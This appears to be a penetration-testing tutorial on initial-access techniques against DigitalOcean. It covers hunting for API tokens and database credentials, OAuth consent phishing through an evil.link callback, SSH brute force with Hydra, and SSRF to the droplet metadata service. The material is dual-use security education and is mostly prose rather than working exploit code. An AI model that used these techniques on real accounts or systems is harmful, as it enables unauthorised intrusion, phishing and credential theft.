Initial Access

We will be looking at Initial Access methods on Digital Ocean, like Droplet Access, API, Phishing, Kubernetes and Container Registry Access, etc.

Introduction

Now that we have sort of a profile of our target, let's see how we can get access to their infrastructure and how Digital Ocean enables us to do it.

Some basics

To be (an Admin) or not to be.

As I explained on the previous article, Digital Ocean has no IAM (or not a good one at least).

Every account has teams, teams can be assigned into projects and every user in a team is an admin on the projects and they can do everything except for assigning other users into teams.

The only one that can do that is the Owner:

So, accessing the dashboard as one of the admins (not necessary an Owner, will give you full access to their projects). How do we do that?

  • Weak/Breached passwords

  • Phishing

  • Physical/GUI Access to their machine

The issue with logging in to the portal

With DO, even if you have not setup 2FA, the site will ask you to setup a 2FA code that is sent to your email address. Now, there is always the chance that the email password and the DO portal is the same, but we will scratch that.

Now, there are some ways to look past that:

  • User Session in a computer: When you login to a device, you can ask DO to trust it, so you don't have to not put a MFA code for 60 days. So, if you have a password and GUI Access to the machine, you can access the portal.

  • Federated Login through other parties: Digital Ocean allows you authenticate through Google and GitHub, so you don't have to have a password for the portal. This, while being ok, has the issue of breached accounts and access through them. So, if an attacker gets access to the Gmail account or the GitHub account that the admin is logging with, they can access the portal. Also, some companies can create a target's account on Gmail or GitHub, as a way to manage the projects, and those accounts usually don't have 2FA.

  • No password expiry on DigitalOcean: There is no password expiry date on DigitalOcean, so you might find the same password even after breaches. This might help to access other parties such as emails, GitHub or even the dashboard.

API Overview in Digital Ocean

DigitalOcean API includes the API of DigitalOcean, Droplet's Meta-Data, OAuth API and Space API.

  • Space API is basically AWS S3 Bucket API with less features

  • OAuth API authentication is done through a Client ID and a Client Secret, which results in a Digital Ocean's API Token

  • Droplet's Meta-Data is the same as the API we find on other cloud provider's VPS on host 169.254.169.254

  • DigitalOcean API is a Rest based API, where you authorize with the token you create on the Dashboard. The tokens can be Read or Read/Write.

DigitalOcean API

DigitalOcean's API can be used to manage:

  • Droplets

  • Functions

  • One-Click Apps

  • Kubernetes

  • Container Registry

  • Databases

  • Snapshots

  • Images

  • Domains

  • Firewalls

  • etc

So, basically anything that is not a Space or Meta-Data.

It's token can be Read or Read/Write for all, so no granular privileges given. Also, the token has a specific format:

dop_v1_<64 chars of nr 0-9 and letters a-f>

For example:

dop_v1_0d858f990cf1cf84291d346538e2ad53532be2569fbeb8f3b7ba6b190d6aa0ad

Those tokens can be used to access the HTTP Based API using curl (or any programmatic equivalent of it), or doctl (DigitalOcean CLI):

As we saw, in both cases, the token needed to be present somewhere (environment variable, inputted as a command, a script file, etc)

We will be looking at DigitalOcean API and see how to get initial access with it.

Where to look

You can look for DO's Token in one of the following places:

  • DO Portal

  • Source Code

  • Config Files

    • Kubernetes

    • Container Registry

  • Console History (bash, sh, zsh, ksh, powershell)

  • Droplets

  • Functions

DO Portal

If you get access as a user on the portal, you can access the APIs or generate a new token. The token show if they are Read or Read/Write Token, or S3 API Token.

This can also be a Persistence, but we'll see that latter.

Config Files

Container Registry Config File

When Container Registry is configured, you get a json file (named docker-config.json) with a base64 credential.

This credential is basically a DigitalOcean Read or Read/Write:

Even though this only says the token Pushes, Pulls or Deletes Images, you get a token with full Read/Write Privileges, which can be used for anything except Spaces. In the example below, we create a droplet using this token:

So, if you find a Container Registry Config File, check for its privileges.

Kubernetes Config File

When a Kubernetes Cluster is created, a YAML config file is created too, in which you will get:

  • Cluster ID

  • Cluster Endpoint

  • Cluster Certificate

  • Cluster Admin

  • DO Token

The token is a read only token, but can still be used for enumeration, since it has Global Reader Rights.

Space

Space API

Spaces use AWS S3 Bucket Technology, so even their API is AWS API. The only differences are that the endpoint is different (https://<region>.digitaloceanspaces.com), Access Key does not have the format (ASIA, AKIA, etc.) and has way less features.

As for privileges, fuck you. A set of credentials can do all. So, no boundaries. A set of creds has S3FullAccess Rights and no granular rights can be set.

Below, there is a matrix of what is allowed and what is not allowed from the API (this was taken on 2022, depending on when you'll see this it might change. Check the link for more: https://docs.digitalocean.com/reference/api/spaces-api/)

If you get access to a set of credentials, depending on the usage of the credential, you can:

  • List and Get sensitive files

    • Code, SSH Keys, Documents

  • Modify files resulting in RCE

  • Access function code stored on spaces

Check for credentials on:

  • Code Repositories

  • awscli or s3api directories on breached machines

  • Other insecure Spaces

  • Different breaches

Phishing Using OAuth API

Digital Ocean's OAuth API allows an application to access your infrastructure with your consent. It's a good way to have temporary access allowed to the infrastructure.

It's also a great phishing method.

OAuth API in Digital Ocean works kind of the same as a combination of Service Principals and Application Consent from Azure. Sort of...

The idea is that we have a Client ID and a Client Secret, and we sent the target a link that points to another address. If they agree to give permission to a project, you get access to that project using a token.

When a request is made, so when the target clicks the link, you get an authorization token. The token is sent as a parameter to the phishing link like:

http://evil.link/?code=<code>

You get that code, the Client ID and Client Secret and you sent a curl request to get an API token.

That way you have access to the infrastructure:

Token Scope

Another thing you should be careful is the scope of the Token. So Access right. By default, when a link is generated (the phishing link), you get a Read Token:

While, if you add the scope as a parameter to the link (&scope=read write) (there is a space between read and write), it becomes a Read/Write Token:

The rest is the same.

Database

Digital Ocean allows you to create managed databases on:

  • MongoDB

  • MySQL

  • PostgreSQL

  • Redis

The host has a specific format:

db-<DB type>-<region>-<some ID>-do-user-<another ID>-0.b.db.ondigitalocean.com

So, you can look at source code locally or in a repository for that.

Another thing you should check is the user, password and port. Usually, the user is doadmin, the port is 25060 and the password has a format of:

AVNS_<19 alphanumeric characters>

Also, the first DB you get is defaultdb.

So, look for that too.

Access for all

When a Database is setup, it allows access to 0.0.0.0, so if you find a CNAME that points to a host, that has the port 25060 open and can connect using a DB Client, you got a database server.

Another free shell

The user that is logged in to the database has admin rights, so we can use system command to run a shell on it:

Also, the DB Server is ran on a Docker container, and I did not find any container breakthroughs. But I might have not checked enough:

Container has access to the internet, but no access to the machines inside the VPC. So, we cannot use that as a pivot.

Functions

As I said on the last article, functions have a specific URL:

https://faas-region-random_chars.doserverless.co/api/v1/web/namespace_ID/package_name/function_file_name?parameter=value

The fields ate the NameSpace, package and functionName.

  • The package is usually named default.

  • Namespace is tricky, as it has the format: fn-cc180aae-dadc-4a12-a64a-547e02ec17a7. It's best to get that through Google Dorking. Fuzzing it will not help much.

As you can see, the output for each case:

  • Parameter not put

  • Good Request

  • Unexistent Function

Are different, so you can use that. Also, on production level functions, empty parameters will output something, so you might use the output for info.

Function's API

Functions can allow raw, unauthenticated requests if Web Functions are enabled.

If not, Functions can be accessed through Function's API. In this case, the request is POST, and the URL format is:

https://faas-fra1-afec6ce7.doserverless.co/api/v1/namespaces/<namespace_id>/actions/<function name>?blocking=true&result=true&otherparameters=otherinputs

Your best bet to get Initial Access using them is through:

  • Finding the link in Source Code

  • Console history file

  • Google Dorking, too much luck and a fuzzer

DO Token

Sometimes, it is necessary to add a token to the function. Functions do not have any sort of key vault or something, but you can configure Environment Variables.

So, if you get access to a function, try to look for:

  • RCE

  • LFI or Directory Traversal

One-Click Apps

To be honest, kind of the same as Functions. Just no Rest API, more output:

The package can be default and the link is:

https://<app name>-<some chars>.ondigitalocean.app/<namespace>/<package>/<action>?<parameters>=<output>

Environment Variables can be still configured. But they only exist during Running and Building. If a token is needed, you will probably find one at:

  • Source Code

  • HTTP Request Parameters

So, pretty much this.

Droplets

SSH Bruteforce

This might seem a bit dumb, but stay with me for a bit.

When you create a Droplet, it asks you for an SSH Key or a password for root so, this is what you can look for.

Also, the password needs to be at least 8 characters, and cannot end in a special character, which is OK, it stops you from saving something like P4ssw0rd... but does not stop you from using P4ssw0rd as a password.

To check if the password authentication is allowed for root (or any user), you can use Hydra.

Also, there is no checks for the amount of tries you do for a password in SSH, so no user lock, meaning you don't need to care about the amount of attempts. Lastly, there is no system that monitors the logins (except for SSH logs ofc, but who checks them anyway), so have fun:

SSH Keys

As I said, when you create a new Droplet, you need to configure a new SSH Key to login. The SSH Key is generated on your machine and then the public key is added to the Droplet.

Now, as we can see, this causes a bit of a problem, when you'll need different keys for different Droplets on different (or same) projects. You'll either going to store the keys somewhere "securely" (like a Space), or use the same key for all.

So, some Initial Access Vectors we can use are:

  • Access to an admin's machine and getting Private SSH Key

  • Spaces with weak permissions

Once we get access with one key, we can check for other hosts with the same key too.

SSRF

Each Droplet has meta-data API, which can be accessed from 169.264.169.254. There is no Meta-DataV2-Like checks for SSRF, so we can leverage SSRF to get access to Meta-Data:

Now, there is no Roles that can be assigned to machines, so no Session Tokens (or any sort of credentials) on Droplets. So, if somebody needs to use them, they need to add them to User-Data and ask that the API Token be stored on Environment Variables. Meaning, the route will be:

SSRF -> Meta-Data -> Access User-Data -> Access Token -> Infrastructure Access

Now, use the same techniques we discussed on the API section to check if the API has Read or Read/Write Access.

Conclusion

There are a lot of ways to get access in DigitalOcean's based infrastructures, and I might have missed some. Next one is Enumeration, where we'll look at how to use those privs to get info that might lead us on PrivEsc or Lateral Movement.

Last updated